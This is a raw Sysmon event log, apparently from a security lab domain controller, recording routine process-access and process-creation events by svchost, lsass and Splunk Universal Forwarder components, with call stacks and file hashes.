10:40:18.182{733EE690-3E09-5F80-3400-000000007F01}20324072C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{733EE690-3E12-5F80-6900-000000007F01}3980C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000002268Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:18.015{733EE690-3E12-5F80-6900-000000007F01}3980C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{733EE690-3DF7-5F80-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{733EE690-3E09-5F80-3400-000000007F01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002310Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:19.979{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0B00-000000007F01}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002309Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:19.979{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0B00-000000007F01}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002308Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:19.979{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0B00-000000007F01}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002307Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:19.869{733EE690-3E0A-5F80-3D00-000000007F01}39003920C:\Windows\system32\conhost.exe{733EE690-3E13-5F80-6B00-000000007F01}3884C:\Program Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002306Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:19.869{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002305Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:19.869{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002304Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:19.869{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002303Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:19.869{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002302Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:19.869{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002301Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:19.869{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002300Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:19.869{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002299Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:19.869{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002298Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:19.869{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002297Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:19.869{733EE690-3DF7-5F80-0500-000000007F01}6442420C:\Windows\system32\csrss.exe{733EE690-3E13-5F80-6B00-000000007F01}3884C:\Program Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002296Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:19.869{733EE690-3E09-5F80-3400-000000007F01}20324072C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{733EE690-3E13-5F80-6B00-000000007F01}3884C:\Program Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000002295Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:19.703{733EE690-3E13-5F80-6B00-000000007F01}3884C:\Program Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe8.0.2Performance monitorsplunk ApplicationSplunk Inc.splunk-perfmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{733EE690-3DF7-5F80-E703-000000000000}0x3e70SystemMD5=1F3027C93882E5D5A667B84CCEF3ED67,SHA256=504CDB3742BCBF617C837270CCEC0243205B7BF0A6AB5117EFB838DD2F004AAC,IMPHASH=53D37CD53647C5D82FCFA9E6970E154E{733EE690-3E09-5F80-3400-000000007F01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002294Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:19.026{733EE690-3E0A-5F80-3D00-000000007F01}39003920C:\Windows\system32\conhost.exe{733EE690-3E12-5F80-6A00-000000007F01}3816C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002293Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:19.026{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002292Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:19.026{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002291Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:19.026{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002290Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:19.026{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002289Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:19.026{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002288Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:19.026{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002287Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:19.026{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002286Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 